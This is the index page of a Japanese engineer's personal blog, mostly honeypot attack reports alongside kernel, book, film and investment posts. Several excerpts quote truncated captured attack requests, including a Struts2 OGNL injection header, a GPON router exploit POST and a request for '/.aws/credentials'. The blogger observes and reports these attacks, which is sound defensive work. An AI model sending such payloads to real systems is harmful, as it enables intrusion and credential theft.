とりあえずブログ

SEとして働く会社員の雑多なブログ

rTorrentの脆弱性を狙った攻撃をキャッチ

最近DASAN Network Solutionsのホームルーターの脆弱性やWebLogicの脆弱性を狙った攻撃ばかりで、つまんないなーと思いながらハニーポットのログを見ていたら、見慣れないログを見かけたので、ご紹介します。 そのログはこんな感じのログです。 POST /RPC2 H…

Linuxのタスクスケジューラーの切り替えを覗いてみた(SystemTap)

Linuxカーネスソースを読む環境は準備できたのですが、どこから手をつけたら良いか分からないので、カーネルの動きを確認できるSystemTapという機能を使用して、遊んでみようと思いました。 まずはLinuxカーネルのタスクスケジューラ機能がどのようにタスク…

Linuxカーネル・ソースを読むための準備した

前回の続きです。 saito.hatenadiary.com 今回はカーネル・ソースを実際に読めるようなところまでの手順をご紹介したいと思います。 SRPMファイルのダウンロード 普通状態であれば、OSにはソースコードは付いてこないので、SRPMファイルというファイルをダウ…

Vagrantでカーネル・ソースを読むための環境を整える

Linuxのカーネル・ソースを読みたくて、その環境をどこかで構築したいと思っていたのですが、AWSだと料金がかかるので、Vagrantを使ってサクッと環境構築してみました。 Vagrantは以前から利用しているのですが、しばらく使用しないでいるとコマンドを忘れて…

【読書メモ】『はじめてのパターン認識』で挫折したところ

機会学習の勉強会やブログなどで、よく紹介されている『はじめてのパターン認識』を読んでみたのですが、僕には3000年くらい早かったらしく挫折したので、どんなところでつまずいたのか備忘のため、残しておきたいと思います。 はじめてのパターン認識作者: …

OSSのウイルス対策ソフト『ClamAV』をUbuntuにインストールしてみた

ハニーポットを運用していて、万が一僕のハニーポットがウイルスに感染したらどうしようと気になってはいました。 なので、ウイルス対策ソフトをインストールしたいと思っていたのですが、どうしても市販のものだと初期費用がかかるし、更新費用とかも気にな…

【投資】双日の決算発表を考察してみた

先日、双日の決算発表がありましたので、総評を述べたいと思います。 当初の計画と実績の比較 僕が双日株を購入したのは、2018年1月でその時点での株価は356円でした。 その時点での四季報による営業利益の推移予想はこんな感じでした。 年月 営業収益 営業…

ハニーポットのログをいつでもどこでも見たいのでAmazon CloudWatch Logsを設定しました

毎日ハニーポットのログを見るのが、日課になっています。 ただ、今はログを見る際パソコンを広げて、見るというスタイルで、いつでもどこでも見ることができるというわけではないので、いつでもどこでもハニーポットのログが確認できるようにAmazon CloudWa…

【書評】伊達政宗かっちょいいっ!ってなる『馬上少年過ぐ』

ゴールデンウィークに仙台に行ってから、すっかり伊達政宗のファンになったので、司馬遼太郎さんの『馬上少年過ぐ』を読みました。 馬上少年過ぐ (新潮文庫)作者: 司馬遼太郎出版社/メーカー: 新潮社発売日: 1978/11/29メディア: 文庫 クリック: 3回この商品…

DASAN Network Solutionsのホームルーターを狙った攻撃(CVE-2018-10561)をキャッチ

5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。 具体的なアクセスは下記のようなものです。 POST /GponForm/diag_Form?images/ HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 119 Content-Type: text/pla…

今さらながらマインクラフトに始めたが、孤独の世界に生まれてしまったorz

ヒカキンさんのマインクラフトの動画を見ていて、とても楽しそうだったので、前にダウンロードしておいたiPhoneのマインクラフトアプリをダウンロードしていて、放置していたのを思い出して、やってみることにしました。 www.youtube.com MinecraftMojangゲ…

ゴールデンウィークもうすぐ終わる!サザエさん症候群がやばい自分のための対策まとめ

もうゴールディンウィークも残り1日となってしまいました。 僕は別に仕事は嫌いじゃないので、あまりサザエさん症候群にならない方なのですが、今回のゴールデンウィークは、祝日が重なり休日がだいぶ長かったので、さすがに月曜が憂鬱です。 サザエさん症候…

Apache Struts2 の脆弱性(CVE-2017-5638)を狙った攻撃をキャッチ

Glastopfのログを見ていて、なんじゃこれってなったログがあったので、ご紹介します。 GET /index.action HTTP/1.1 Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAc…

仙台初心者おすすめ!観光バス『るーぷる仙台』

ゴールデンウィーク前半はベガルタ仙台対コンサドーレ札幌の試合を観戦しに、仙台に行ったんですが、次の日が1日暇だったので、観光バス「るーぷる仙台」に乗って、仙台の名所を回って最高だったので、ご紹介します。 るーぷる仙台とは|仙台市観光シティル…

シンプルだけど怖い!AWS認証情報を取得しようとするリクエスト

4月の中旬くらいからGlastopfを使用したハニーポットを構築し、定期的にログをウォッチしているのですが、珍しめのログをご紹介したいと思います。 1週間に1件くらいの頻度ですが、下記のアクセスが僕のハニーポットにきます。 GET /.aws/credentials HTTP/1…

【書評】学びが多いイケダハヤトさんの『武器としての書く技術』

ブログをやっていて書くことに対して、まだまだ抵抗があったり、億劫になってしまう自分がいたので、書くことに抵抗をなくしたいと思い、イケダハヤトさんの『武器としての書く技術』を読みました。 武器としての書く技術 (中経出版)作者: イケダハヤト出版…

フェイスブックの出会い系参入でマッチ・グループ株暴落と思うじゃん?意外と買い時かも

今朝起き、何気なく株価をチェックしていたら僕の所有するマッチ・グループの株価が22%も下落しているのに気がつきました。 何が起こったかと思って調べてみると、どうやらフェイスブックが出会い系サービスを展開すると発表したことに嫌気をさし、急激な売…

【映画】キャラがかっこよすぎ!『マイティ・ソー バトルロイヤル』の感想

『アベンジャーズ/インフィニティウォー』が公開されたので、最近関連映画を鬼のように鑑賞しまくっているのですが、今回は『マイティ・ソー バトルロイヤル』を観たので、その感想です。 マイティ・ソー バトルロイヤル (字幕版)発売日: 2018/01/10メディア…

Cisco Linksys E-seriesを狙ったような攻撃をキャッチ

CiscoのLinksys E-seriesを狙ったような攻撃をキャッチしたので、ご紹介します。 CiscoのLinksys E-seriesとは Ciscoから販売されている自宅用のワイヤレスルータのようです。 今回の攻撃 今回はこんな感じのリクエストがハニーポットに来ていました。 POST …

Drupal の脆弱性(CVE-2018-7600)の攻撃例

先日ご紹介したDrupalの脆弱性を狙ったアタックの具体的な攻撃例をご紹介します。 saito.hatenadiary.com 今回僕のハニーポットに来ていた攻撃のアクセスは3種類あり、どれもphpファイルを配置するような動きを行う処理でした。 curlコマンドでwp-stats.txt…

WebLogic の脆弱性(CVE-2017-10271)を狙った攻撃をキャッチ

古い脆弱性ですが、面白い攻撃ログを僕のハニハニちゃんがキャッチしたので、ご紹介します。 キャッチしたログはこんな感じです。 POST /wls-wsat/CoordinatorPortType HTTP/1.1 Connection: Close Content-Length: 1214 Content-Type: text/xml Host: XXX.X…

DoS攻撃かと思ったよ

今日帰ってきて、何気なくこのブログのアクセスを見たところ、アクセス数が100を余裕で超えていて、驚きました。 その時僕はこう思いました。 俺終わった。。。 先日、Drupalの脆弱性の件を注意喚起したせいで、攻撃者を本気で怒らせてしまったと、このとき…

【書評】改めてイーロンの凄さを知る『イーロン・マスク 世界をつくり変える男』

書店にふらっと立ち寄って、気になった『イーロン・マスク 世界をつくり変える男』を読んだので、その感想です。 イーロン・マスク 世界をつくり変える男作者: 竹内一正出版社/メーカー: ダイヤモンド社発売日: 2018/01/25メディア: 単行本(ソフトカバー)…

Drupalを狙ったと思われるアタック(CVE-2018-7600)をキャッチ

先日より僕のハニーポットが動作しているのですが、さっそく怪しいアクセスをキャッチしたので、紹介します。 saito.hatenadiary.com 実際の僕のハニーポットで取得できたログはこんな感じです。 一応あれかなと思いアクセス元のIPアドレスは伏せてあります…

【映画】ベインがゴリゴリの強さを発揮する『ダークナイト ライジング』の感想

最近見ているバットマン3部作の完結編である『ダークナイト ライジング』を見たので、その感想です。 ダークナイト ライジング (字幕版)発売日: 2013/11/26メディア: Amazonビデオこの商品を含むブログを見る この映画でもっとも特徴的だったのは、異様なマ…

ハニーポッターになりました(Glastopfデビュー)

以前の記事でもご紹介したのですが、今回Webアプリケーション型のハニーポットであるGlastopfをAWSのEC2にインストールしたので、手順を紹介したいと思います。 saito.hatenadiary.com 下記公式サイトで詳細な手順は記載されているので、あまりつまずくとこ…

【映画】ブルースがかっこよすぎる『バットマン ビギンズ』の感想

見る順番を間違えてしまったのですが、アマゾンプライムで『バットマン ビギンズ』を見たので、その感想です。 バットマン ビギンズ (字幕版)発売日: 2013/11/26メディア: Amazonビデオこの商品を含むブログを見る この映画ではバットマンのルーツとなるスト…

ハニーポットを作りたい

最近九州商船の記事を見て、セキュリティ対応の重要性を感じておりますが、僕のAWS環境もmessagesログを見ると、確かに不審なアカウントでアクセスしようとしている痕跡があったりするので、インターネットの世界は攻撃だらけなのかなと思っています。 www.o…

【映画】ジョーカー凄すぎでしょ笑『バッドマン ダークナイト』の感想

アマゾンプライムで、『バットマン ダークナイト』が無料視聴の対象になっていたので、観た感想です。 ダークナイト (字幕版)発売日: 2013/11/26メディア: Amazonビデオこの商品を含むブログを見る 僕としては、バットマンの使用している武器や乗り物のかっ…

腹筋割る計画の中間報告(4月時点)

4月になりましたので、月次で行なっている僕の腹筋割る計画の中間報告を行いたいと思います。 3月は全然ジムに行けなかったけど、毎週フットサルはしていたので、そのあたりがどのように体重や体脂肪に影響してくるかが気になるところです。 サマリ 運動につ…